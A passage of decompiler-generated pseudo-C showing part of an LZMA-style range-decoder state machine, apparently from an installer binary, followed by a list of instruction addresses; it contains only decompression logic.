												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406355
0x00406355
0x00406359
0x00406382
0x0040638c
0x0040635b
0x00406364
0x00406371
0x00406374
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
